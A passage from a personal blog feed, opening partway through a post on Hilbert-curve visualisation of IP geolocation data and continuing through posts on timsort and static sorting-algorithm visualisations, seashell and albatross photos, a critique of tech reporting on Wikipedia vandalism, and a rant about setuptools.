there is a single U to be replaced, in the N=2 diagram there are 4 U-shapes
(two at the top, oriented left and right, and two at the bottom oriented down).
Each subsequent order has 4 times the number of U shapes the previous one had,
so for N=3 we have 16 replacements to do, and so on and so forth.</p>
<p>Mathematicians are interested in the behaviour of the limit curve as N
approaches infinity - luckily the properties of the curve that are interesting
to computer scientists manifest well short of that. For the purposes of this
post, we can view the order-N curve simply as a way to lay out a sequence of
2**(2N) items on a plane, with the rather interesting property that items that
are near each other in the sequence are also near each other on the plane:</p>
<div class="media">
<a href="coordinates.png">
<img src="coordinates.png" />
</a>
</div>
<p>The recursive construction above is a nice way to explain the curve, but doesn't
lead to an efficient way to actually draw it. For this I turned to Henry S.
Warren's wonderful <a href="http://www.amazon.com/exec/obidos/ASIN/0201914654/qid%3D1033395248/sr%3D11-1/ref%3Dsr_11_1/104-7035682-9311161">Hacker's
Delight</a>, one of those books that I return to again and again. If you don't
already own a copy, just buy it - you won't be disappointed. All the images in
this post and in the Explorer were drawn with PyCairo using the algorithm for
calculating co-ordinates from the distance along the curve given in section 14.4
of this book.</p>
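For readers without the book to hand, the distance-to-coordinate conversion can be sketched in a few lines of Python. This is a common iterative formulation of the same idea (not necessarily Warren's exact code): at each bit level it extracts the quadrant, rotates the coordinates as needed, and accumulates the offsets:

```python
def d2xy(order, d):
    """Map distance d along the order-N Hilbert curve to (x, y) coordinates."""
    x = y = 0
    s = 1
    while s < (1 << order):
        rx = 1 & (d // 2)           # which half of the current quadrant
        ry = 1 & (d ^ rx)
        if ry == 0:                 # rotate the quadrant when needed
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        d //= 4
        s *= 2
    return x, y
```

Consecutive distances map to adjacent cells - which is exactly the locality property the visualisations below rely on.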
<h2 id="visualising-ip-geolocation">Visualising IP Geolocation</h2>
<p>Mapping IP addresses to countries is a tricky affair. Control of any given
address filters down from IANA to the regional registries, from regional
registries to national and local registries, and from there to a myriad of
private and government organisations. Here, horse-trading and private enterprise
takes over and IP blocks are sold, traded and routed arbitrarily, with the
consequence that any given IP might actually be located in a geographical area
totally unrelated to the controlling organisation or even the registry region. A
number of companies now offer geolocation databases at various prices, some of
them for free. The databases themselves typically contain more than 100,000
subnets, usually spanning something like two billion actual addresses. I had
about half a dozen of these databases to compare, and, being a visual creature,
I wanted to <strong>see</strong> what I was dealing with. I've been fascinated with the
Hilbert curve for a long time, but I first came across the idea of using it to
visualise the entire IPv4 address space in Randall Munroe's excellent <a
href="http://xkcd.com/195/">hand-drawn map of the Internet</a>. After this was
published in 2006 a slew of more detailed visualisations appeared, including at
least <a href="http://www.isi.edu/ant/address/whole_internet/index.html">one on
a 1:1 scale</a>.</p>
<p>We can map X points of data onto a discrete Hilbert curve of order lb(X)/2, so
the order 16 Hilbert curve would suffice to display all 2**32 IP addresses at
a one-to-one scale. To produce a more manageable image size, I used an order 9
Hilbert curve producing a 512x512 pixel image, where each pixel represents a
bucket of 16384 addresses. I then rendered a series of transparent PNG layers -
one showing all addresses in the database, and a set of overlays showing the
addresses in each country and some "landmarks" like the <a
href="http://tools.ietf.org/html/rfc1918">RFC1918</a> addresses. The result
looks something like the image at the head of this post. To make the
visualisation more interactive, I bolted things together with a bit of
Javascript to let me easily switch between countries, and to show IP addresses
when hovering over the image. You can find the resulting visualisation for one
of the freely-available geolocation databases - <a
href="http://www.wipmania.com/en/base/">WorldIP</a> - here:</p>
<h2 id="hilbert-explorer"><a href="/geohilbert/index.html">Hilbert Explorer</a></h2>
<p>I'll stop there for now, and leave the actual database comparison and a deeper
exploration of the related issues for future posts.</p>
Seashells from Murdering Beach
2009-08-28T00:00:00+00:00
2009-08-28T00:00:00+00:00
https://corte.si/posts/photos/murderingshells/
<style>
.shells td {
border-bottom: 0;
}
</style>
<table class="shells">
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863253255/" title="051shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863253255_b6a88458a6_t.jpg" width="100" height="100" alt="051shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863255667/" title="052shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2477/3863255667_9de928b4d2_t.jpg" width="100" height="100" alt="052shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863256917/" title="056shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2626/3863256917_9da498eb94_t.jpg" width="100" height="100" alt="056shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864040990/" title="057shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2601/3864040990_b6465402e8_t.jpg" width="100" height="100" alt="057shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864042394/" title="059shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2662/3864042394_fd9a3e2f14_t.jpg" width="100" height="100" alt="059shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864043258/" title="060shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2557/3864043258_2187b97b8c_t.jpg" width="100" height="100" alt="060shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863260683/" title="061shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2553/3863260683_6cc9662275_t.jpg" width="100" height="100" alt="061shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864044842/" title="062shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3181/3864044842_83ed99b591_t.jpg" width="100" height="100" alt="062shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863262185/" title="064shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3454/3863262185_c93aff80f1_t.jpg" width="100" height="100" alt="064shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863263741/" title="065shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2596/3863263741_1de40df77a_t.jpg" width="100" height="100" alt="065shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863264743/" title="066shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2531/3863264743_e51a081754_t.jpg" width="100" height="100" alt="066shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863265971/" title="067shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2584/3863265971_a540e4cd74_t.jpg" width="100" height="100" alt="067shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863267413/" title="068shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3513/3863267413_efda95bd09_t.jpg" width="100" height="100" alt="068shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863268603/" title="069shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2461/3863268603_49c216a076_t.jpg" width="100" height="100" alt="069shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863270349/" title="070shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2565/3863270349_2df1a30663_t.jpg" width="100" height="100" alt="070shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863271463/" title="071shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2633/3863271463_b8bb6c9416_t.jpg" width="100" height="100" alt="071shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864056086/" title="072shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2449/3864056086_9bd2441496_t.jpg" width="100" height="100" alt="072shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863273851/" title="073shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863273851_e36366e0aa_t.jpg" width="100" height="100" alt="073shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863275055/" title="074shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3547/3863275055_0b078205e7_t.jpg" width="100" height="100" alt="074shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863276473/" title="075shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3438/3863276473_918bc411d0_t.jpg" width="100" height="100" alt="075shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864061252/" title="076shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2552/3864061252_48d169eac2_t.jpg" width="100" height="100" alt="076shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864062554/" title="077shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3226/3864062554_3b2ac66bcf_t.jpg" width="100" height="100" alt="077shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864063810/" title="078shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2459/3864063810_5cf4bcfb9a_t.jpg" width="100" height="100" alt="078shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864064924/" title="079shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3511/3864064924_bcb95a8ea2_t.jpg" width="100" height="100" alt="079shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864065752/" title="080shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2519/3864065752_44baaafcef_t.jpg" width="100" height="100" alt="080shells" /></a></td>
</tr>
</table>
<p>Spent the morning collecting and taking photos of tiny seashells on Murdering
Beach - a secluded local spot with a grisly past. The shells are all about the
same size - a centimeter or so across - and seem to be from the same species of
marine mollusc. The variety of patterns and colours is endless and fascinating -
my inexpertly lit photographs don't do them justice.</p>
Sorting Algorithm Visualisation Tidbits
2009-08-11T00:00:00+00:00
2009-08-11T00:00:00+00:00
https://corte.si/posts/code/sortingquickies/
<ul>
<li>Jacob Seidelin has created an awesome port of the sorting algorithm
visualisations I came up with in 2007 to Javascript, using the canvas element
to do the drawing. <a
href="http://blog.nihilogic.dk/2009/04/canvas-visualizations-of-sorting.html">Well
worth checking out</a>.</li>
<li>Another blogger (I'd love to be more specific, but the blog seems to be
anonymous) was spurred by my post to wonder what sorting algorithms <em>sound</em>
like. The fascinating result is <a
href="http://www.pillowsopher.com/blog/?cat=4">over here</a>. Bubblesort turns
out to be quite musical - who knew?</li>
<li>Finally, timsort, which I drew <a href="https://corte.si/posts/code/timsort/">pictures of in my last
post</a>, has <a
href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6804124">replaced
mergesort in Java.</a></li>
</ul>
Visualising Sorting Algorithms: Python's timsort
2009-08-08T00:00:00+00:00
2009-08-08T00:00:00+00:00
https://corte.si/posts/code/timsort/
<p><strong>Update</strong> See <a href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p>
<p>A couple of years ago, I blogged about a technique I came up with for
<a href="https://corte.si/posts/code/visualisingsorting/">statically visualising sorting
algorithms</a> during a somewhat
Scotch-fueled night of idle hacking. A recent day of poking at the Python
codebase gave me an excuse to revisit the post and brush off the bit of code
that underpins it. I've wanted to take a closer look at timsort - Tim Peters'
wonderful sorting implementation for Python - for a while now. In the previous
post I made a big deal about the fact that many attributes of sorting algorithms
are easier to see in my static visualisations than in traditional animated
equivalents. So, I thought it would be fun to see if one could get to grips with
a real-world algorithm like timsort by visualising it. The fruit of my labour
can be found below - if this kind of thing turns your crank, read on.</p>
<p>Before you go on, you might first want to take a look at the <a href="https://corte.si/posts/code/visualisingsorting/">original
post</a> for an explanation of how the
diagrams are constructed and some related caveats.</p>
<h2 id="inspecting-timsort">Inspecting timsort</h2>
<p>The first step was to get hold of the progressive sorting data I needed for the
visualisation. The way timsort is implemented has two properties that helped
here - firstly, it's largely in-place, and secondly, when interrupted by an
exception in the __cmp__ method of one of the elements it is sorting, it
leaves the array partially sorted. The pleasant result is that I could get all
the data I needed in pure Python, without instrumenting the interpreter source.
A link to the code is at the bottom of this post.</p>
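The same trick still works today, though in Python 3 the sort protocol moved from __cmp__ to __lt__. A minimal sketch (class and function names are mine): wrap each value in an object whose comparison raises once a budget of comparisons is spent, and CPython's sort hands back the partially sorted items when the exception propagates:

```python
class Spy:
    """Wrapper whose comparisons raise after a fixed budget is exhausted."""
    budget = 0

    def __init__(self, value):
        self.value = value

    def __lt__(self, other):
        if Spy.budget <= 0:
            raise RuntimeError("snapshot time")
        Spy.budget -= 1
        return self.value < other.value

def snapshot_after(data, comparisons):
    """Return the state of the array after the given number of comparisons."""
    arr = [Spy(v) for v in data]
    Spy.budget = comparisons
    try:
        arr.sort()
    except RuntimeError:
        pass  # timsort leaves arr partially sorted - exactly what we want
    return [s.value for s in arr]
```

Call snapshot_after repeatedly with an increasing budget and you have the full progressive-sorting trace, one comparison at a time.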
<h2 id="a-first-guess-at-the-algorithm">A first guess at the algorithm</h2>
<p>The first thing I did was to see if I could get a feel for timsort straight
from the visualisation, without looking at the implementation (yes, I'm
cheating slightly, since I already had an idea of what I would see). Here's
timsort sorting a shuffled array of 64 elements:</p>
<div class="media">
<a href="64r-tim.png">
<img src="64r-tim.png" />
</a>
<div class="subtitle">
timsort - 64 elements
</div>
</div>
<p>It's immediately clear that timsort has divided the data up into two blocks of
32 elements. The blocks are pre-sorted in turn (the first two "triangles" of
activity, reading from left to right), before being merged together in the final
step (the cross-hatch pattern at the right of the diagram). Looking closer, it's
even possible to tell that the pre-sorting seems to be using insertion sort -
compare the distinctive triangular pattern here with the insertion sort
visualisation in the <a href="https://corte.si/posts/code/visualisingsorting/">previous post</a>.
We can confirm this by taking the same data, and running it through an insertion
sort visualisation. Here's the first block of 32 elements sorted by insertion
sort:</p>
<div class="media">
<a href="half.png">
<img src="half.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<p>As you can see, this sorting sequence is identical to the one in the upper-left
part of the timsort diagram. A similar bit of hackery would show that the final
merge is done with mergesort. Ok, so at this point, we can take a stab at a
broad outline of the timsort algorithm: break the data up into blocks, pre-sort
those blocks using insertion sort, and then merge the blocks together using
mergesort.</p>
<p>This is pretty good going for quick inspection of a single diagram.</p>
<h2 id="what-s-actually-happening">What's actually happening</h2>
<p>Flicking to the <a href="http://bugs.python.org/file4451/timsort.txt">cheat
sheet</a>, we can see that this guess is almost right. The business-end of
timsort is a mergesort that operates on runs of pre-sorted elements. A minimum
run length <strong>minrun</strong> is chosen to make sure the final merges are as balanced as
possible - for 64 elements, <strong>minrun</strong> happens to be 32. Before the merges
begin, a single pass is made through the data to detect pre-existing runs of
sorted elements. Descending runs are handled by simply reversing them in place.
If the resultant run length is less than <strong>minrun</strong>, it is boosted to <strong>minrun</strong>
using insertion sort. On a shuffled array with no significant pre-existing runs,
this process looks exactly like our guess above: pre-sorting blocks of
<strong>minrun</strong> elements using insertion sort, before merging with merge sort.</p>
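The <strong>minrun</strong> computation itself is a neat bit of arithmetic: CPython keeps the six most significant bits of N, adding one if any of the bits shifted away were set, which lands <strong>minrun</strong> in the range 32 to 64 for any large array. A sketch following the description in listsort.txt:

```python
def merge_compute_minrun(n):
    """Timsort's minrun: the six most significant bits of n, plus one
    if any of the bits shifted away were set."""
    r = 0
    while n >= 64:
        r |= n & 1
        n >>= 1
    return n + r
```

For 64 elements this yields exactly 32 - hence the two pre-sorted blocks in the diagram above.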
<p>We can see a bit more detail by giving timsort the type of data it excels at -
a partially sorted array:</p>
<div class="media">
<a href="combo.png">
<img src="combo-annotated.png" />
</a>
<div class="subtitle">
timsort - 64 elements
</div>
</div>
<p>Now, looking at the marked progression from left to right:</p>
<ul>
<li><strong>1)</strong> timsort finds a descending run, and reverses the run in-place. This is done
directly on the array of pointers, so it seems "instant" from our vantage point.</li>
<li><strong>2)</strong> The run is now boosted to length <strong>minrun</strong> using insertion sort.</li>
<li><strong>3)</strong> No run is detected at the beginning of the next block, and insertion sort
is used to sort the entire block. Note that the sorted elements at the bottom
of this block are not treated specially - timsort doesn't detect runs that
start in the middle of blocks being boosted to <strong>minrun</strong>.</li>
<li><strong>4)</strong> Finally, mergesort is used to merge the runs.</li>
</ul>
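Steps 1) and 2) hinge on run detection. A sketch in the spirit of CPython's count_run (simplified, and with the name borrowed from the C source): it measures the run starting at a given index, reversing it in place if it is descending. Note that descending runs must be <em>strictly</em> descending, so that reversing them in place keeps the sort stable:

```python
def count_run(a, lo=0):
    """Length of the run starting at lo; a strictly descending run is
    reversed in place so that every detected run ends up ascending."""
    hi = lo + 1
    if hi == len(a):
        return 1
    if a[hi] < a[lo]:                            # strictly descending run
        while hi + 1 < len(a) and a[hi + 1] < a[hi]:
            hi += 1
        a[lo:hi + 1] = a[lo:hi + 1][::-1]        # reverse it in place
    else:                                        # non-decreasing run
        while hi + 1 < len(a) and a[hi + 1] >= a[hi]:
            hi += 1
    return hi - lo + 1
```

If the run that comes back is shorter than <strong>minrun</strong>, the real algorithm extends it with insertion sort, exactly as in step 2) above.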
<p>Of course, there's a lot that's not covered here: merge order, stability, the
secondary memory requirements of the algorithm, and so forth. Maybe I'll get to
some of these in a follow-up post. That said, I think this is still quite a
reasonable high-level pictorial guide to timsort.</p>
<p>I relied heavily on <a href="http://bugs.python.org/file4451/timsort.txt">Uncle
Tim's own description of the algorithm</a> in writing this post - if you're
interested in timsort, this document is definitely mandatory reading.</p>
<h2 id="the-code">The Code</h2>
<p>I've brushed up the code I included in my previous post and put it on <a
href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check
it out like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/sortvis.git
</span></code></pre>
Buller's Albatross
2009-07-12T00:00:00+00:00
2009-07-12T00:00:00+00:00
https://corte.si/posts/photos/bullers/
<p>An encounter with a magnificent bird today - Buller's Albatross. It glided in
to the side of the boat we were in to check if we had any fish, but took off
disappointed when it turned out we did not:</p>
<center>
<a href="http://www.flickr.com/photos/8268815@N08/3715192684/" title="Buller's Albatross by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2610/3715192684_fae89809e5.jpg" width="500" height="189" alt="Buller's Albatross" /></a>
</center>
How to become a cyber bandit
2008-06-03T00:00:00+00:00
2008-06-03T00:00:00+00:00
https://corte.si/posts/security/badreporting/
<p>I came across a hilariously inept bit of tech reporting today, courtesy of the
Sydney Morning Herald. Apparently the Wikipedia page for Mick Keelty,
Australia's Federal Police Commissioner, was vandalised last week. Hardly
earth-shattering, right? Just revert the changes, and move on. To a
sensation-hungry hack without the faintest clue what Wikipedia is, however, this
looks like a Story. More particularly, it looks like a story entitled "<a
href="http://www.smh.com.au/news/technology/cyber-bandit-sabotages-top-cop/2008/05/31/1212258621186.html">Cyber
bandit sabotages top cop</a>".</p>
<p>The article gives a minutely detailed rundown of the rather juvenile vandalism
(apparently perpetrated by a not very imaginative 13-year-old), and is
accompanied by a stock photo showing a depressed-looking Keelty, evidently
meditating on the deep unfairness of it all. The Wikipedia vandal is not just a
"cyber bandit" - he is also referred to as a "hacker" throughout. The icing on
the cake, however, is what has to be a mis-quote from <a
href="http://en.wikipedia.org/wiki/Angela_Beesley">Angela Beesley</a>:</p>
<blockquote>
<p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person
who made the edits infiltrated the site from outside.</p>
</blockquote>
<p>Infiltrated Wikipedia from the outside? You don't say.</p>
setuptools sucks
2007-06-18T00:00:00+00:00
2007-06-18T00:00:00+00:00
https://corte.si/posts/code/setuptoolssucks/
<p>One of the epic conflicts of our time is being waged between two software design
philosophies (bear with me here). Those who follow <strong>Design Philosophy A</strong> trust
their users. Software is designed to be transparent and easy to inspect. Users
are provided with simple and direct ways to control behaviour, and their choices
are respected. Software developers avoid guessing the user's intent, since users
can be trusted to do the sensible thing themselves. Those who follow <strong>Design
Philosophy B</strong> think their users are idiots. Software is therefore opaque and
difficult to inspect, because users wouldn't understand what is going on, and
should be prevented from even trying. The developer's guess is always more
trustworthy than the user's command. Users are robbed of options, because if we
give the user too much control, they'll just fuck things up.</p>
<p>Philosophy A has given you the open source movement, Unix and the Internet.
Philosophy B has given you the Microsoft Paperclip, DRM and an endless stream of
clueless MCSEs. Philosophy A stands for open standards, free information
exchange, and user control. Philosophy B restricts how you can use information
stored on your own computer, violates your privacy, and puts the interests of
software makers ahead of those of the user. In corner A stand Richard Stallman,
Linus Torvalds and Theo de Raadt, dressed in light and armed with flaming
swords. In corner B, wreathed in shadow, stand Bill Gates, a cohort of ignorant
greedy politicians and a dark army of patent lawyers.</p>
<p>It is against this epic background that I invite you to consider another player
on the side of darkness: <a
href="http://peak.telecommunity.com/DevCenter/setuptools">setuptools</a>. No, I
don't think <a href="http://dirtsimple.org/">Phillip J. Eby</a> is out to take
control of your computer and leech your bank account details (though you might
well prefer this to his attempts to <a
href="http://dirtsimple.org/2007/02/how-not-to-be-loser.html">de-activate your
loser circuit</a>). I surely do believe, though, that he thinks you are an
idiot. Because setuptools, again and again, makes some decidedly Philosophy B
design decisions. Witness:</p>
<ul>
<li>Setuptools is nosy. It deduces things magically from the version control
system you use, so when you enter the Brave New World of <a href="
http://git.or.cz/">distributed versioning</a>, all your build and
distribution scripts silently malfunction.</li>
<li>Setuptools is needlessly opaque. <a
href="http://peak.telecommunity.com/DevCenter/PythonEggs">Eggs</a> break
simple transparencies we currently take for granted - for example, we lose
the ability to trivially inspect installed libraries with a pager, or to
easily list the contents of an installed module. They also complicate more
subtle things - because eggs are compressed, project data file access becomes
a pain. If you need direct file access, you need to use even MORE setuptools
magic to unpack project data files to a temporary directory.</li>
<li>Setuptools is obstinate. It will automatically insert .eggs at the head of
your sys.path to make sure they get imported in preference to any existing
libraries. If I insert something into sys.path (say, for instance, to run a
test suite against the development version of my library), I do NOT want my
distribution mechanism to over-ride me. And no, using the setuptools
development mode magic is not a satisfactory answer.</li>
</ul>
<p>This type of intrusive design is disrespectful to users. Whenever you prefer to
trust your own imperfect guesses, rather than letting the user specify what they
want, you are disrespectful to your users. Whenever you needlessly make a system
obscure to inspection, you are disrespectful to your users. Whenever you allow
your software to spill beyond its rightful bounds (by, for example, getting
intimate with my version control system), you are disrespectful to your users.</p>
<p>I believe that most people use setuptools because it provides a few simple
pieces of functionality that could easily be added to distutils without the
dross and bad design. Grafting dependencies and better package data management
onto distutils would go about 80% of the way to meeting my modest expectations.
Sadly, in one of those minor tragedies that life is so full of, it appears that
setuptools <a
href="http://mail.python.org/pipermail/python-dev/2006-April/063964.html">wins
by default</a>, simply because the problem domain is so goddamn boring that
no-one else has bothered.</p>
Visualising Sorting Algorithms
2007-04-27T00:00:00+00:00
2007-04-27T00:00:00+00:00
https://corte.si/posts/code/visualisingsorting/
<p><strong>Update</strong> See <a href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p>
<p>I dislike <a
href="http://ftp.csci.csusb.edu/public/class/cs455/cs455_2000/java/InsertionSortLauncher.html">animated</a>
<a href="http://www.cs.ubc.ca/~harrison/Java/sorting-demo.html">sorting</a> <a
href="http://www2.hawaii.edu/~copley/665/HSApplet.html">algorithm</a> <a
href="http://en.wikipedia.org/wiki/Image:Sorting_heapsort_anim.gif">visualisations</a> - there's too much of an air of hocus-pocus about them. Something
impressive and complicated happens on screen, but more often than not the
audience is left mystified. I think their creators must also know that they
have precious little explanatory value, because the better ones are sexed up
with play-by-play doodles, added, one feels, as an apologetic afterthought by
some particularly dorky sportscaster. Nevertheless I've been unable to
find a single attempt to visualise a sorting algorithm statically (if you know
of any, please drop me a line).</p>
<p>So, presented below are the results of a pleasant evening with some nice Scotch
and the third volume of Knuth. First, here's a taster - a static visualisation
of heapsort:</p>
<div class="media">
<a href="heap.png">
<img src="heap.png" />
</a>
<div class="subtitle">
Heapsort
</div>
</div>
<p>I think these simple static visualisations are much clearer than most animated
attempts - and they have the added benefit of also being, to my not entirely
unbiased eye, rather beautiful. You will find more visualisations, source code,
and a tediously long explanation of why I bothered, after the jump.</p>
<h2 id="the-problem">The Problem</h2>
<p>Before I go on, though, bear with me while I press home my point about
animation with a particularly heinous example of the genre. I found the
following specimen on the <a
href="http://en.wikipedia.org/wiki/Bubblesort">Wikipedia page for
Bubblesort</a>:</p>
<div class="media">
<a href="bubble_sort_animation.gif">
<img src="bubble_sort_animation.gif" />
</a>
<div class="subtitle">
Bubblesort visualisation from Wikipedia
</div>
</div>
<p>Now, it is my measured opinion that this animation has all the explanatory power
of a glob of porridge flung against a wall. To see why I say this, try to find
rough answers to the following set of simple questions with reference to it:</p>
<ul>
<li>After what percentage of time is half of the array sorted?</li>
<li>Can you find an element that moved about half the length of the array to
reach its final destination?</li>
<li>What percentage of the array was sorted after 80% of the sorting process?
How about 20%?</li>
<li>Does the number of sorted elements grow linearly or non-linearly with
time (e.g. logarithmically or exponentially)?</li>
</ul>
<p>If you thought that was harder than it needed to be, blame animation. First,
while humans are great at estimating distances in space, they are pretty bad at
estimating distances in time. This is why you had to watch the animation two or
three times to answer the first question. When we translate time to a geometric
length, as is done in any scientific diagram with a time dimension, this
estimation process becomes easy. Second, many questions about sorting algorithms
require us to actively compare the sorting state at two or more different time
points. Since we don't have perfect memories, this is very, very hard in all but
the simplest cases. This leaves us with a strangely one-dimensional view into an
animation - we can see what's on screen at any given moment, but we have to
strain to answer simple questions about, say, rates of change. Which is why the
final question is hard to answer accurately.</p>
<h2 id="finding-flatland">Finding Flatland</h2>
<p>It turns out that it is pretty easy to find a static, two-dimensional encoding
for the sorting process. The specific technique used here only works when the
sorting algorithm is in-place, i.e. does not use any storage external to the
array itself. Some of the algorithms below have been slightly modified from
their standard forms to make sure they have this property. The magnitude of a
number is indicated by shading - higher numbers are darker, and lower numbers
are lighter. We begin on the left hand side with the numbers in a random order,
and the sorting progression plays out until we reach the right hand side with a
sorted sequence. Time, in this particular case, is measured by the number of
"swaps" performed. This means that all swaps are equidistant on the diagram, and
that only a single swap occurs at any point in time. When I refer to "time"
when talking about these diagrams, I am therefore not referring to clock time.</p>
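<p>To make the encoding concrete, here is a minimal sketch of the recording step - this is illustrative only, not the actual visualise.py, and the helper names are made up. An in-place sort is driven through a swap callback, and the array is snapshotted after every swap, so each snapshot becomes one equidistant column of the diagram:</p>

```python
def record_swaps(arr, sort):
    """Run an in-place sort, snapshotting the array after every swap.

    Each snapshot is one column of the diagram, so all swaps end up
    equidistant along the time axis.
    """
    frames = [list(arr)]
    def swap(i, j):
        arr[i], arr[j] = arr[j], arr[i]
        frames.append(list(arr))
    sort(arr, swap)
    return frames

def bubblesort(arr, swap):
    # In-place bubblesort, phrased purely in terms of swaps.
    for limit in range(len(arr) - 1, 0, -1):
        for i in range(limit):
            if arr[i] > arr[i + 1]:
                swap(i, i + 1)

def shade(value, hi):
    # Map magnitude to a grey level: higher numbers are darker.
    return 255 - round(255 * value / hi)

frames = record_swaps([4, 1, 3, 2], bubblesort)
```

<p>Each column of <code>frames</code> can then be painted using <code>shade</code> to reproduce the light-to-dark encoding described above; the real script drives Cairo to do the actual drawing.</p>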
<p>Now, I should be clear at the outset that I haven't tried to pack these
diagrams with as much information as possible. For example, I don't include
tick marks for time units, nor do I explicitly mark algorithm details.
Instead, I've simply tried to produce images that give a clear sense of the
"flow" over time of the algorithms, while simultaneously not being an eyesore.
I might produce some scaled-up, annotated versions of the diagrams in a
future post.</p>
<h2 id="bubblesort">Bubblesort</h2>
<div class="media">
<a href="bubble.png">
<img src="bubble.png" />
</a>
<div class="subtitle">
Bubble sort
</div>
</div>
<p>So, let's start with a static visualisation of <a
href="http://en.wikipedia.org/wiki/Bubble_sort">bubblesort</a>. Notice that,
even without any labelling, we can "read off" the answers to all the questions
posed above pretty trivially:</p>
<ul>
<li>The sorted portion of the sequence is clearly visible as a triangular
block in the bottom-right of the image, so we can easily locate the point
at which half the array is sorted, and read off the percentage of time
taken.</li>
<li>Since the start and end positions of each element are visible on the
graph, finding an element that moved about 50% of the length of the array
is simple.</li>
<li>Similarly, the percentage of the array that is sorted at 20% and 80% of
the process can just be read off.</li>
<li>Lastly, we can clearly see that the curve of sorted elements is not
linear, but is probably close to n^2.</li>
</ul>
<p>Other features of the algorithm are also clearer - for instance, the famous
"rabbits" and "turtles" are clearly identifiable. In the diagram the "rabbits"
are the dark lines sweeping down to their positions rapidly, and the turtles
are the lighter lines that gradually curve towards the top right of the image.</p>
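<p>Those lines are nothing more than each value's position plotted over time. A small sketch (again illustrative only, with made-up helper names) that extracts such a trajectory from a sequence of snapshots:</p>

```python
def bubblesort_frames(arr):
    """Snapshot a copy of the array after every bubblesort swap."""
    a = list(arr)
    frames = [list(a)]
    for limit in range(len(a) - 1, 0, -1):
        for i in range(limit):
            if a[i] > a[i + 1]:
                a[i], a[i + 1] = a[i + 1], a[i]
                frames.append(list(a))
    return frames

def trajectory(frames, value):
    """The index of `value` at each time step - one line in the diagram."""
    return [f.index(value) for f in frames]

frames = bubblesort_frames([9, 3, 8, 2, 7, 1])
rabbit = trajectory(frames, 9)   # sweeps to the far end within the first pass
turtle = trajectory(frames, 1)   # creeps back only one position per pass
```

<p>On data like this, the rabbit's trajectory changes by one index per swap until it reaches its final slot, while the turtle's changes by only one index per full pass - exactly the steep dark lines and gradual light curves visible in the image.</p>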
<h2 id="heapsort">Heapsort</h2>
<div class="media">
<a href="heap.png">
<img src="heap.png" />
</a>
<div class="subtitle">
Heapsort
</div>
</div>
<p>Now, let's return to the <a
href="http://en.wikipedia.org/wiki/Heapsort">heapsort</a> image at the top of
this article. First, a quick (and superficial) refresher on the algorithm
itself:</p>
<ul>
<li>Step 1: Arrange the elements in the array to form a "heap" -
a data structure that allows us to find the largest element in constant
time.</li>
<li>Step 2: Peel off the largest element, and move it to below the heap.</li>
<li>Step 3: The heap is now disrupted, so we do some work to re-establish the
heap property.</li>
<li>Step 4: Repeat steps 2-3 until the entire array is sorted.</li>
</ul>
